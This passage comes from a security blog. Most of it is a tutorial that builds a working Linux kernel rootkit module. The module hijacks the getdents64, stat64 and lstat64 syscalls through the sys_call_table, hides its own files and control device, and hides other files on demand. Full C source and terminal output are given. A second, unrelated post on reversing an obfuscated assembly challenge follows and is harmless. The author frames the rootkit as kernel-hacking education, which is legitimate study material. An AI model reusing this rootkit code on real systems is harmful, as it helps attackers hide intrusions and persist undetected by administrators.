[email protected]:~/lkms/hidefiles# python -c 'open("/dev/hidefiles", "w").write("a:hidefiles.ko")'
[email protected]:~/lkms/hidefiles# ls
app    cdev.c  cdev.o    functs.h  hidefiles.mod.c  hidefiles.o  list.h  main.c  Makefile       Module.symvers  syscalls.h
app.c  cdev.h  functs.c  functs.o  hidefiles.mod.o  list.c       list.o  main.o  modules.order  syscalls.c      syscalls.o
[email protected]:~/lkms/hidefiles# python -c 'open("/dev/hidefiles", "w").write("a:app")'
[email protected]:~/lkms/hidefiles# ls
app.c   cdev.h  functs.c  functs.o         hidefiles.mod.o  list.c  list.o  main.o    modules.order   syscalls.c  syscalls.o
cdev.c  cdev.o  functs.h  hidefiles.mod.c  hidefiles.o      list.h  main.c  Makefile  Module.symvers  syscalls.h
[email protected]:~/lkms/hidefiles# python -c 'open("/dev/hidefiles", "w").write("a:app.c")'
[email protected]:~/lkms/hidefiles# ls
cdev.c  cdev.o    functs.h  hidefiles.mod.c  hidefiles.o  list.h  main.c  Makefile       Module.symvers  syscalls.h
cdev.h  functs.c  functs.o  hidefiles.mod.o  list.c       list.o  main.o  modules.order  syscalls.c      syscalls.o
[email protected]:~/lkms/hidefiles# python -c 'open("/dev/hidefiles", "w").write("r:app.c")'
[email protected]:~/lkms/hidefiles# ls
app.c   cdev.h  functs.c  functs.o         hidefiles.mod.o  list.c  list.o  main.o    modules.order   syscalls.c  syscalls.o
cdev.c  cdev.o  functs.h  hidefiles.mod.c  hidefiles.o      list.h  main.c  Makefile  Module.symvers  syscalls.h
[email protected]:~/lkms/hidefiles# python -c 'open("/dev/hidefiles", "w").write("r:app")'
[email protected]:~/lkms/hidefiles# ls
app    cdev.c  cdev.o    functs.h  hidefiles.mod.c  hidefiles.o  list.h  main.c  Makefile       Module.symvers  syscalls.h
app.c  cdev.h  functs.c  functs.o  hidefiles.mod.o  list.c       list.o  main.o  modules.order  syscalls.c      syscalls.o
[email protected]:~/lkms/hidefiles# python -c 'open("/dev/hidefiles", "w").write("a:hidefiles.mod.c")'
[email protected]:~/lkms/hidefiles# ls
app    cdev.c  cdev.o    functs.h  hidefiles.mod.o  list.c  list.o  main.o    modules.order   syscalls.c  syscalls.o
app.c  cdev.h  functs.c  functs.o  hidefiles.o      list.h  main.c  Makefile  Module.symvers  syscalls.h
[email protected]:~/lkms/hidefiles# python -c 'open("/dev/hidefiles", "w").write("a:hidefiles.mod.o")'
[email protected]:~/lkms/hidefiles# ls
app    cdev.c  cdev.o    functs.h  hidefiles.o  list.h  main.c  Makefile       Module.symvers  syscalls.h
app.c  cdev.h  functs.c  functs.o  list.c       list.o  main.o  modules.order  syscalls.c      syscalls.o
[email protected]:~/lkms/hidefiles# rmmod hidefiles
[email protected]:~/lkms/hidefiles# ls
app     cdev.h    functs.h      hidefiles.mod.c  list.c  main.c    modules.order   syscalls.h
app.c   cdev.o    functs.o      hidefiles.mod.o  list.h  main.o    Module.symvers  syscalls.o
cdev.c  functs.c  hidefiles.ko  hidefiles.o      list.o  Makefile  syscalls.c      thisisatestfile.txt

As you can see, we are now able to hide and unhide files on demand, there is, however, still a problem:

1
2
3
4
5
6
[email protected]:~/lkms/hidefiles# insmod ./hidefiles.ko
[email protected]:~/lkms/hidefiles# ls
app    cdev.c  cdev.o    functs.h  hidefiles.ko     hidefiles.mod.o  list.c  list.o  main.o    modules.order   syscalls.c  syscalls.o
app.c  cdev.h  functs.c  functs.o  hidefiles.mod.c  hidefiles.o      list.h  main.c  Makefile  Module.symvers  syscalls.h
[email protected]:~/lkms/hidefiles# ls thisisatestfile.txt
thisisatestfile.txt

Hiding Files Better

Now let's hide the files even when they are queried directly.

To figure out how to do this we will use the same method as we did when figuring out how to hide files to being with, by looking at the system calls that are being made and hooking them.

We will start by determining the system calls responsible for this:

1
2
3
4
5
[email protected]:~/lkms/hidefiles# strace ls thisisatestfile.txt 2>&1 | grep 'thisisatestfile.txt'
execve("/bin/ls", ["ls", "thisisatestfile.txt"], [/* 18 vars */]) = 0
stat64("thisisatestfile.txt", {st_mode=S_IFREG|0644, st_size=0, ...}) = 0
lstat64("thisisatestfile.txt", {st_mode=S_IFREG|0644, st_size=0, ...}) = 0
write(1, "thisisatestfile.txt\n", 20thisisatestfile.txt

I've grepped for the filename because the system call must be querying the filename directly, we've found 2 (stat64 and lstat64).

It looks like it returns 0 when its successful, let's see what happens when its unsuccessful:

1
2
3
4
5
[email protected]:~/lkms/hidefiles# strace ls thisisnotafile.txt 2>&1 | grep 'thisisnotafile.txt'
execve("/bin/ls", ["ls", "thisisnotafile.txt"], [/* 18 vars */]) = 0
stat64("thisisnotafile.txt", 0x8cdf3b8) = -1 ENOENT (No such file or directory)
lstat64("thisisnotafile.txt", 0x8cdf3b8) = -1 ENOENT (No such file or directory)
write(2, "cannot access thisisnotafile.txt", 32cannot access thisisnotafile.txt) = 32

So they return -ENOENT if the file does not exist.

Another thing to note about this output is that the second argument to both stat64 and lstat64 is a pointer to a buffer which on a success is populated by the system call and obviously left blank in a failure.

The manpage for these functions confirms that:

1
2
int stat(const char *path, struct stat *buf);
int lstat(const char *path, struct stat *buf);

We don't care too much about the stat struct because if it matches any of our hidden files we will just return -ENOENT and otherwise we will forward the request to the original system call.

If we wanted to actually manipulate the results that applications got back from these systems calls, we could use this structure to do so.

One more thing to check is what the request looks like when a full path is given:

1
2
3
4
[email protected]:~/lkms/hidefiles# strace ls ~/lkms/hidefiles/thisisatestfile.txt 2>&1 | grep 'thisisatestfile.txt'
stat64("/root/lkms/hidefiles/thisisatestfile.txt", {st_mode=S_IFREG|0644, st_size=0, ...}) = 0
lstat64("/root/lkms/hidefiles/thisisatestfile.txt", {st_mode=S_IFREG|0644, st_size=0, ...}) = 0
write(1, "/root/lkms/hidefiles/thisisatest"..., 41/root/lkms/hidefiles/thisisatestfile.txt

So the full path is passed to the system call, we will have to deal with this because obviously we only have a list of filenames so we will have to manually extract the actual filename to check against our list.

First let's write the function which extracts the filename from the full path and checks if it is in the list:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
int extractfilename(const char *f)
{
    int i, n, c;
    size_t l;
    l = strlen(f);

    for(i = l-1, n = 0; i>=0; i--, n++){
        if(f[i] == '/'){
            i = -1;
            break;
        }
    }

    if(i == -1)
        c = n+1;
    else
        c = l;

    char s[c];
    memset(s, 0, c);

    for(i = 0; n>0; i++, n--)
        s[i] = f[l-n];

    return lookupfilename(s);
}

We need to add the prototype in list.h so that the other files can use it:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
#ifndef LIST
#define LIST

#include <linux/vmalloc.h>

// Functions
void addfile(const char *f);
void remfile(const char *f);
void emptylist(void);
int lookupfilename(const char *f);
int extractfilename(const char *f);

#endif

Now for the system calls, this should be added to syscalls.c:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
asmlinkage int (*original_stat64) (const char *path, struct stat64 *buf);
asmlinkage int (*original_lstat64) (const char *path, struct stat64 *buf);

asmlinkage int stat64_hook(const char *path, struct stat64 *buf)
{
    if ((extractfilename(path)) == 1)
        return -ENOENT;
    return original_stat64(path, buf);
}

asmlinkage int lstat64_hook(const char *path, struct stat64 *buf)
{
    if ((extractfilename(path)) == 1)
        return -ENOENT;
    return original_lstat64(path, buf);
}

And we need to update syscalls.h:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
#ifndef SYSCALLS
#define SYSCALLS

#include <linux/semaphore.h>
#include <linux/types.h>
#include <linux/dirent.h>
#include <linux/stat.h>

// Functions
asmlinkage int sys_getdents64_hook(unsigned int fd, struct linux_dirent64 *dirp, unsigned int count);
extern asmlinkage int (*original_getdents64) (unsigned int fd, struct linux_dirent64 *dirp, unsigned int count);
asmlinkage int stat64_hook(const char *path, struct stat64 *buf);
asmlinkage int lstat64_hook(const char *path, struct stat64 *buf);
extern asmlinkage int (*original_stat64) (const char *path, struct stat64 *buf);
extern asmlinkage int (*original_lstat64) (const char *path, struct stat64 *buf);

#endif

We need to include linux/stat.h because that includes the declaration of the stat64 structure.

And lastly we need to update main.c to hook and unhook these 2 syscalls on load/unload:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
#include <linux/module.h>
#include <linux/init.h>
#include <linux/unistd.h>
#include <linux/miscdevice.h>

#include "syscalls.h"
#include "functs.h"
#include "list.h"
#include "cdev.h"

MODULE_AUTHOR("0xe7, 0x1e");
MODULE_DESCRIPTION("Hide files on the system");
MODULE_LICENSE("GPL");

void **sys_call_table;

static int __init hidefiles_init(void)
{
    sys_call_table = find_sys_call_table();
    if(sys_call_table == NULL)
        return 1;
    original_getdents64 = sys_call_table[__NR_getdents64];
    original_stat64 = sys_call_table[__NR_stat64];
    original_lstat64 = sys_call_table[__NR_lstat64];

    disable_write_protection();
    sys_call_table[__NR_getdents64] = sys_getdents64_hook;
    sys_call_table[__NR_stat64] = stat64_hook;
    sys_call_table[__NR_lstat64] = lstat64_hook;
    enable_write_protection();
    misc_register(&dev_misc_device);
    addfile("hidefiles");
    addfile("hidefiles.ko");
    return 0;
}

static void __exit hidefiles_exit(void)
{
    disable_write_protection();
    sys_call_table[__NR_getdents64] = original_getdents64;
    sys_call_table[__NR_stat64] = original_stat64;
    sys_call_table[__NR_lstat64] = original_lstat64;
    enable_write_protection();
    misc_deregister(&dev_misc_device);
    emptylist();
    return;
}

module_init(hidefiles_init);
module_exit(hidefiles_exit);

I've changed the files that it automatically hides when loaded to hidefiles (which is the name of the character device file) and hidefiles.ko (which is the name of the LKM) because this is more useful, in reality these would be named something less descriptive and the other source files wouldn't be there.

Finally to test it:

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
[email protected]:~/lkms/hidefiles# make -C /lib/modules/$(uname -r)/build M=$PWD modules
make: Entering directory `/usr/src/linux-headers-3.14-kali1-686-pae'
  CC [M]  /root/lkms/hidefiles/main.o
/root/lkms/hidefiles/main.c: In function ‘hidefiles_init’:
/root/lkms/hidefiles/main.c:19:17: warning: assignment from incompatible pointer type [enabled by default]
  CC [M]  /root/lkms/hidefiles/syscalls.o
  CC [M]  /root/lkms/hidefiles/list.o
/root/lkms/hidefiles/list.c: In function ‘extractfilename’:
/root/lkms/hidefiles/list.c:110:2: warning: ISO C90 forbids mixed declarations and code [-Wdeclaration-after-statement]
  CC [M]  /root/lkms/hidefiles/cdev.o
/root/lkms/hidefiles/cdev.c: In function ‘dev_write’:
/root/lkms/hidefiles/cdev.c:51:1: warning: the frame size of 1032 bytes is larger than 1024 bytes [-Wframe-larger-than=]
  LD [M]  /root/lkms/hidefiles/hidefiles.o
  Building modules, stage 2.
  MODPOST 1 modules
  CC      /root/lkms/hidefiles/hidefiles.mod.o
  LD [M]  /root/lkms/hidefiles/hidefiles.ko
make: Leaving directory `/usr/src/linux-headers-3.14-kali1-686-pae'
[email protected]:~/lkms/hidefiles# ls -l
total 852
-rwxr-xr-x 1 root root   5765 Nov  5 13:49 app
-rw-r--r-- 1 root root    594 Nov  5 13:09 app.c
-rw-r--r-- 1 root root   1462 Nov  5 20:10 cdev.c
-rw-r--r-- 1 root root    281 Nov  5 12:32 cdev.h
-rw-r--r-- 1 root root  58968 Nov  5 20:34 cdev.o
-rw-r--r-- 1 root root   1359 Oct 31 16:08 functs.c
-rw-r--r-- 1 root root    154 Oct 31 16:10 functs.h
-rw-r--r-- 1 root root  69332 Oct 31 16:12 functs.o
-rw-r--r-- 1 root root 278101 Nov  5 20:41 hidefiles.ko
-rw-r--r-- 1 root root   1203 Nov  5 20:34 hidefiles.mod.c
-rw-r--r-- 1 root root  43172 Nov  5 20:34 hidefiles.mod.o
-rw-r--r-- 1 root root 235955 Nov  5 20:41 hidefiles.o
-rw-r--r-- 1 root root   2015 Nov  5 20:12 list.c
-rw-r--r-- 1 root root    227 Nov  5 20:34 list.h
-rw-r--r-- 1 root root  21336 Nov  5 20:34 list.o
-rw-r--r-- 1 root root   1261 Nov  5 20:41 main.c
-rw-r--r-- 1 root root  72572 Nov  5 20:41 main.o
-rw-r--r-- 1 root root     78 Nov  5 11:34 Makefile
-rw-r--r-- 1 root root     41 Nov  5 20:41 modules.order
-rw-r--r-- 1 root root      0 Oct 31 14:11 Module.symvers
-rw-r--r-- 1 root root   1163 Nov  5 20:32 syscalls.c
-rw-r--r-- 1 root root    672 Nov  5 20:30 syscalls.h
-rw-r--r-- 1 root root  19560 Nov  5 20:34 syscalls.o
-rw-r--r-- 1 root root      0 Oct 31 14:18 thisisatestfile.txt
[email protected]:~/lkms/hidefiles# insmod ./hidefiles.ko
[email protected]:~/lkms/hidefiles# ls -l
total 580
-rwxr-xr-x 1 root root   5765 Nov  5 13:49 app
-rw-r--r-- 1 root root    594 Nov  5 13:09 app.c
-rw-r--r-- 1 root root   1462 Nov  5 20:10 cdev.c
-rw-r--r-- 1 root root    281 Nov  5 12:32 cdev.h
-rw-r--r-- 1 root root  58968 Nov  5 20:34 cdev.o
-rw-r--r-- 1 root root   1359 Oct 31 16:08 functs.c
-rw-r--r-- 1 root root    154 Oct 31 16:10 functs.h
-rw-r--r-- 1 root root  69332 Oct 31 16:12 functs.o
-rw-r--r-- 1 root root   1203 Nov  5 20:34 hidefiles.mod.c
-rw-r--r-- 1 root root  43172 Nov  5 20:34 hidefiles.mod.o
-rw-r--r-- 1 root root 235955 Nov  5 20:41 hidefiles.o
-rw-r--r-- 1 root root   2015 Nov  5 20:12 list.c
-rw-r--r-- 1 root root    227 Nov  5 20:34 list.h
-rw-r--r-- 1 root root  21336 Nov  5 20:34 list.o
-rw-r--r-- 1 root root   1261 Nov  5 20:41 main.c
-rw-r--r-- 1 root root  72572 Nov  5 20:41 main.o
-rw-r--r-- 1 root root     78 Nov  5 11:34 Makefile
-rw-r--r-- 1 root root     41 Nov  5 20:41 modules.order
-rw-r--r-- 1 root root      0 Oct 31 14:11 Module.symvers
-rw-r--r-- 1 root root   1163 Nov  5 20:32 syscalls.c
-rw-r--r-- 1 root root    672 Nov  5 20:30 syscalls.h
-rw-r--r-- 1 root root  19560 Nov  5 20:34 syscalls.o
-rw-r--r-- 1 root root      0 Oct 31 14:18 thisisatestfile.txt
[email protected]:~/lkms/hidefiles# ls -l /dev/hidefiles
ls: cannot access /dev/hidefiles: No such file or directory
[email protected]:~/lkms/hidefiles# ls -l hidefiles.ko
ls: cannot access hidefiles.ko: No such file or directory
[email protected]:~/lkms/hidefiles# ls -l ~/lkms/hidefiles/hidefiles.ko
ls: cannot access /root/lkms/hidefiles/hidefiles.ko: No such file or directory
[email protected]:~/lkms/hidefiles# python -c 'open("/dev/hidefiles", "w").write("a:list.c")'
[email protected]:~/lkms/hidefiles# ls -l list.c
ls: cannot access list.c: No such file or directory
[email protected]:~/lkms/hidefiles# ls
app     functs.c         hidefiles.o  Makefile        syscalls.o
app.c   functs.h         list.h       modules.order   thisisatestfile.txt
cdev.c  functs.o         list.o       Module.symvers
cdev.h  hidefiles.mod.c  main.c       syscalls.c
cdev.o  hidefiles.mod.o  main.o       syscalls.h
[email protected]:~/lkms/hidefiles# python -c 'open("/dev/hidefiles", "w").write("a:list.h")'
[email protected]:~/lkms/hidefiles# python -c 'open("/dev/hidefiles", "w").write("a:list.o")'
[email protected]:~/lkms/hidefiles# ls
app     cdev.o    hidefiles.mod.c  main.o          syscalls.c
app.c   functs.c  hidefiles.mod.o  Makefile        syscalls.h
cdev.c  functs.h  hidefiles.o      modules.order   syscalls.o
cdev.h  functs.o  main.c           Module.symvers  thisisatestfile.txt
[email protected]:~/lkms/hidefiles# for f in `ls`; do python -c "open('/dev/hidefiles', 'w').write(\"a:$f\")"; done
[email protected]:~/lkms/hidefiles# ls
[email protected]:~/lkms/hidefiles# ls -l
total 0
[email protected]:~/lkms/hidefiles# python -c 'open("/dev/hidefiles", "w").write("r:list.o")'
[email protected]:~/lkms/hidefiles# ls
list.o
[email protected]:~/lkms/hidefiles# rmmod hidefiles
[email protected]:~/lkms/hidefiles# ls
app     cdev.o    hidefiles.ko     list.c  main.o          syscalls.c
app.c   functs.c  hidefiles.mod.c  list.h  Makefile        syscalls.h
cdev.c  functs.h  hidefiles.mod.o  list.o  modules.order   syscalls.o
cdev.h  functs.o  hidefiles.o      main.c  Module.symvers  thisisatestfile.txt

Funnily enough this also hides directories with a name that is in the list but doesn't stop you from cd'ing there:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
[email protected]:~/lkms/hidefiles# insmod ./hidefiles.ko
[email protected]:~/lkms/hidefiles# cd ..
[email protected]:~/lkms# ls -l
total 720
-rw-r--r-- 1 root root    380 May 12 19:47 hello.c
-rw-r--r-- 1 root root  74389 Jul 11 17:54 hello.ko
-rw-r--r-- 1 root root    659 Jul 11 17:54 hello.mod.c
-rw-r--r-- 1 root root  42436 Jul 11 17:54 hello.mod.o
-rw-r--r-- 1 root root  32960 Jul 11 17:53 hello.o
-rw-r--r-- 1 root root   2080 Jul 11 18:18 hidefile.c
-rw-r--r-- 1 root root 122949 Jul 11 18:18 hidefile.ko
-rw-r--r-- 1 root root    810 Jul 11 17:54 hidefile.mod.c
-rw-r--r-- 1 root root  42636 Jul 11 17:54 hidefile.mod.o
-rw-r--r-- 1 root root  81320 Jul 11 18:18 hidefile.o
-rw-r--r-- 1 root root    195 Jul 11 17:51 Makefile
-rw-r--r-- 1 root root     86 Jul 11 18:18 modules.order
-rw-r--r-- 1 root root      0 May 12 19:35 Module.symvers
-rwxr-xr-x 1 root root   6107 Jun  4 21:04 reverse_app
-rwxr-xr-x 1 root root   6135 Jun  9 23:21 reverse-app
-rwxr-xr-x 1 root root   6140 Jun  9 23:41 reverse-app2
-rw-r--r-- 1 root root    899 Jun  9 23:41 reverse-app2.c
-rw-r--r-- 1 root root    899 Jun  9 23:14 reverse-app.c
-rw-r--r-- 1 root root   2013 Jun  9 22:49 reverse.c
-rw-r--r-- 1 root root 119395 Jul 11 17:54 reverse.ko
-rw-r--r-- 1 root root   1019 Jul 11 17:54 reverse.mod.c
-rw-r--r-- 1 root root  42888 Jul 11 17:54 reverse.mod.o
-rw-r--r-- 1 root root  77532 Jul 11 17:53 reverse.o
-rwxr-xr-x 1 root root   6587 Jun  9 22:25 reverse-test-app
-rw-r--r-- 1 root root    987 Jun  9 22:16 reverse-test-app.c
-rw-r--r-- 1 root root      0 Jul 11 18:18 thisisatestfile.txt
[email protected]:~/lkms# ls -l hidefiles
ls: cannot access hidefiles: No such file or directory
[email protected]:~/lkms# ls -l hidefiles/
total 580
-rwxr-xr-x 1 root root   5765 Nov  5 13:49 app
-rw-r--r-- 1 root root    594 Nov  5 13:09 app.c
-rw-r--r-- 1 root root   1462 Nov  5 20:10 cdev.c
-rw-r--r-- 1 root root    281 Nov  5 12:32 cdev.h
-rw-r--r-- 1 root root  58968 Nov  5 20:34 cdev.o
-rw-r--r-- 1 root root   1359 Oct 31 16:08 functs.c
-rw-r--r-- 1 root root    154 Oct 31 16:10 functs.h
-rw-r--r-- 1 root root  69332 Oct 31 16:12 functs.o
-rw-r--r-- 1 root root   1203 Nov  5 20:34 hidefiles.mod.c
-rw-r--r-- 1 root root  43172 Nov  5 20:34 hidefiles.mod.o
-rw-r--r-- 1 root root 235955 Nov  5 20:41 hidefiles.o
-rw-r--r-- 1 root root   2015 Nov  5 20:12 list.c
-rw-r--r-- 1 root root    227 Nov  5 20:34 list.h
-rw-r--r-- 1 root root  21336 Nov  5 20:34 list.o
-rw-r--r-- 1 root root   1261 Nov  5 20:41 main.c
-rw-r--r-- 1 root root  72572 Nov  5 20:41 main.o
-rw-r--r-- 1 root root     78 Nov  5 11:34 Makefile
-rw-r--r-- 1 root root     41 Nov  5 20:41 modules.order
-rw-r--r-- 1 root root      0 Oct 31 14:11 Module.symvers
-rw-r--r-- 1 root root   1163 Nov  5 20:32 syscalls.c
-rw-r--r-- 1 root root    672 Nov  5 20:30 syscalls.h
-rw-r--r-- 1 root root  19560 Nov  5 20:34 syscalls.o
-rw-r--r-- 1 root root      0 Oct 31 14:18 thisisatestfile.txt
[email protected]:~/lkms# cd hidefiles
[email protected]:~/lkms/hidefiles#

Anyway, our improved rootkit seems to work nicely and as expected.

It is still currently easy to detect our rootkit though:

1
2
[email protected]:~/lkms/hidefiles# lsmod | grep hide
hidefiles              12763  0

You can get the full finished source code for the rootkit here.

Conclusion

We have used a number of techniques here to figure out how to hide files on the system and we have combined all of the knowledge we have gained to far to achieve this.

However, there are still a lot of ways we can improve this LKM, hiding the LKM's existence, and using the network to communicate are just a couple (we will take these up later).

When dealing with kernel code you have to be very careful as you can break the whole system, this is evident with the first character device that we created (just load the device and write 5000 bytes to it, the system will crash instantly).

Happy Kernel Hacking :-)

Further Reading

This article on Kernel Rootkit Tricks by Jürgen Quade

The Phrack article titled Linux on-the-fly kernel patching without LKM by sd and devik

Designing BSD Rootkits by Joseph Kong

And of course the kernel documentation

✇eXploit

Reversing A Simple Obfuscated Application

By: 0xe7

I created this application as a little challenge and some practice at manually obfuscating an application at the assembly level.

I wrote the application in IA32 assembly and then manually obfuscated it using a couple of different methods.

Here I will show how to solve the challenge in 2 different ways.

Lastly I will show how the obfuscation could have been done better so that it would have been a lot more difficult to solve this using a simple static disassembly.

The Challenge

We are given the static disassembly below of a 32bit linux application which says whether or not the author is going to some event:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
./going-or-not-obf:     file format elf32-i386


Disassembly of section .text:

08048060 <.text>:
 8048060:   89 c2                   mov    edx,eax
 8048062:   bf 25 00 00 00          mov    edi,0x25
 8048067:   eb 4d                   jmp    0x80480b6
 8048069:   b3 32                   mov    bl,0x32
 804806b:   5e                      pop    esi
 804806c:   31 c0                   xor    eax,eax
 804806e:   74 6c                   je     0x80480dc
 8048070:   b7 6a                   mov    bh,0x6a
 8048072:   e8 17 00 00 00          call   0x804808e
 8048077:   b1 04                   mov    cl,0x4
 8048079:   8a 06                   mov    al,BYTE PTR [esi]
 804807b:   29 cc                   sub    esp,ecx
 804807d:   41                      inc    ecx
 804807e:   30 c8                   xor    al,cl
 8048080:   31 c9                   xor    ecx,ecx
 8048082:   83 f8 04                cmp    eax,0x4
 8048085:   74 12                   je     0x8048099
 8048087:   8d 4d f1                lea    ecx,[ebp-0xf]
 804808a:   b2 10                   mov    dl,0x10
 804808c:   eb 09                   jmp    0x8048097
 804808e:   31 db                   xor    ebx,ebx
 8048090:   31 c9                   xor    ecx,ecx
 8048092:   89 ca                   mov    edx,ecx
 8048094:   ff 24 24                jmp    DWORD PTR [esp]
 8048097:   eb 05                   jmp    0x804809e
 8048099:   8d 4d e5                lea    ecx,[ebp-0x1b]
 804809c:   b2 0c                   mov    dl,0xc
 804809e:   31 c0                   xor    eax,eax
 80480a0:   b0 08                   mov    al,0x8
 80480a2:   bb 04 00 00 00          mov    ebx,0x4
 80480a7:   29 d8                   sub    eax,ebx
 80480a9:   29 c3                   sub    ebx,eax
 80480ab:   43                      inc    ebx
 80480ac:   cd 80                   int    0x80
 80480ae:   31 c0                   xor    eax,eax
 80480b0:   31 db                   xor    ebx,ebx
 80480b2:   fe c0                   inc    al
 80480b4:   cd 80                   int    0x80
 80480b6:   e8 ae ff ff ff          call   0x8048069
 80480bb:   ed                      in     eax,dx
 80480bc:   4e                      dec    esi
 80480bd:   65 23 2a                and    ebp,DWORD PTR gs:[edx]
 80480c0:   2d 2b 23 64 30          sub    eax,0x3064232b
 80480c5:   2b 2a                   sub    ebp,DWORD PTR [edx]
 80480c7:   64 29 25 64 0d 4e 65    sub    DWORD PTR fs:0x654e0d64,esp
 80480ce:   23 2a                   and    ebp,DWORD PTR [edx]
 80480d0:   2d 2b 23 64 29          sub    eax,0x2964232b
 80480d5:   25 64 0d ee 89          and    eax,0x89ee0d64
 80480da:   89 c5                   mov    ebp,eax
 80480dc:   b0 c9                   mov    al,0xc9
 80480de:   01 f8                   add    eax,edi
 80480e0:   eb 1f                   jmp    0x8048101
 80480e2:   8d 55 00                lea    edx,[ebp+0x0]
 80480e5:   88 0c 24                mov    BYTE PTR [esp],cl
 80480e8:   4c                      dec    esp
 80480e9:   68 e9 80 04 08          push   0x80480e9
 80480ee:   85 d2                   test   edx,edx
 80480f0:   38 02                   cmp    BYTE PTR [edx],al
 80480f2:   0f 84 78 ff ff ff       je     0x8048070
 80480f8:   89 fb                   mov    ebx,edi
 80480fa:   83 c3 1f                add    ebx,0x1f
 80480fd:   30 1a                   xor    BYTE PTR [edx],bl
 80480ff:   4a                      dec    edx
 8048100:   c3                      ret    
 8048101:   31 ed                   xor    ebp,ebp
 8048103:   31 c9                   xor    ecx,ecx
 8048105:   31 d2                   xor    edx,edx
 8048107:   42                      inc    edx
 8048108:   8d 2c 0c                lea    ebp,[esp+ecx*1]
 804810b:   8a 0c 16                mov    cl,BYTE PTR [esi+edx*1]
 804810e:   38 c1                   cmp    cl,al
 8048110:   74 d0                   je     0x80480e2
 8048112:   88 0c 24                mov    BYTE PTR [esp],cl
 8048115:   83 ec 01                sub    esp,0x1
 8048118:   42                      inc    edx
 8048119:   89 e4                   mov    esp,esp
 804811b:   83 f9 00                cmp    ecx,0x0
 804811e:   7f eb                   jg     0x804810b
 8048120:   89 ed                   mov    ebp,ebp
 8048122:   c3                      ret

The challenge is to figure out whether or not the author is going based solely on this static disassembly.

Method 1: The Easy Way

In this method we'll rebuild the application and simply run it to get the answer.

The first step is to copy the instruction into a new nasm file, if we do that we get:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
global _start

section .text

_start:
    mov    edx,eax
    mov    edi,0x25
    jmp    0x80480b6
    mov    bl,0x32
    pop    esi
    xor    eax,eax
    je     0x80480dc
    mov    bh,0x6a
    call   0x804808e
    mov    cl,0x4
    mov    al,BYTE PTR [esi]
    sub    esp,ecx
    inc    ecx
    xor    al,cl
    xor    ecx,ecx
    cmp    eax,0x4
    je     0x8048099
    lea    ecx,[ebp-0xf]
    mov    dl,0x10
    jmp    0x8048097
    xor    ebx,ebx
    xor    ecx,ecx
    mov    edx,ecx
    jmp    DWORD PTR [esp]
    jmp    0x804809e
    lea    ecx,[ebp-0x1b]
    mov    dl,0xc
    xor    eax,eax
    mov    al,0x8
    mov    ebx,0x4
    sub    eax,ebx
    sub    ebx,eax
    inc    ebx
    int    0x80
    xor    eax,eax
    xor    ebx,ebx
    inc    al
    int    0x80
    call   0x8048069
    in     eax,dx
    dec    esi
    and    ebp,DWORD PTR gs:[edx]
    sub    eax,0x3064232b
    sub    ebp,DWORD PTR [edx]
    sub    DWORD PTR fs:0x654e0d64,esp
    and    ebp,DWORD PTR [edx]
    sub    eax,0x2964232b
    and    eax,0x89ee0d64
    mov    ebp,eax
    mov    al,0xc9
    add    eax,edi
    jmp    0x8048101
    lea    edx,[ebp+0x0]
    mov    BYTE PTR [esp],cl
    dec    esp
    push   0x80480e9
    test   edx,edx
    cmp    BYTE PTR [edx],al
    je     0x8048070
    mov    ebx,edi
    add    ebx,0x1f
    xor    BYTE PTR [edx],bl
    dec    edx
    ret    
    xor    ebp,ebp
    xor    ecx,ecx
    xor    edx,edx
    inc    edx
    lea    ebp,[esp+ecx*1]
    mov    cl,BYTE PTR [esi+edx*1]
    cmp    cl,al
    je     0x80480e2
    mov    BYTE PTR [esp],cl
    sub    esp,0x1
    inc    edx
    mov    esp,esp
    cmp    ecx,0x0
    jg     0x804810b
    mov    ebp,ebp
    ret

When we try to assemble this we get:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
[email protected]:~# nasm -felf32 -o going-or-not-obf-test1 going-or-not-obf-test1.nasm going-or-not-obf-test1.nasm:16: error: comma, colon or end of line expected
going-or-not-obf-test1.nasm:29: error: comma, colon or end of line expected
going-or-not-obf-test1.nasm:47: error: comma, colon or end of line expected
going-or-not-obf-test1.nasm:49: error: comma, colon or end of line expected
going-or-not-obf-test1.nasm:50: error: comma, colon or end of line expected
going-or-not-obf-test1.nasm:51: error: comma, colon or end of line expected
going-or-not-obf-test1.nasm:59: error: comma, colon or end of line expected
going-or-not-obf-test1.nasm:63: error: comma, colon or end of line expected
going-or-not-obf-test1.nasm:67: error: comma, colon or end of line expected
going-or-not-obf-test1.nasm:75: error: comma, colon or end of line expected
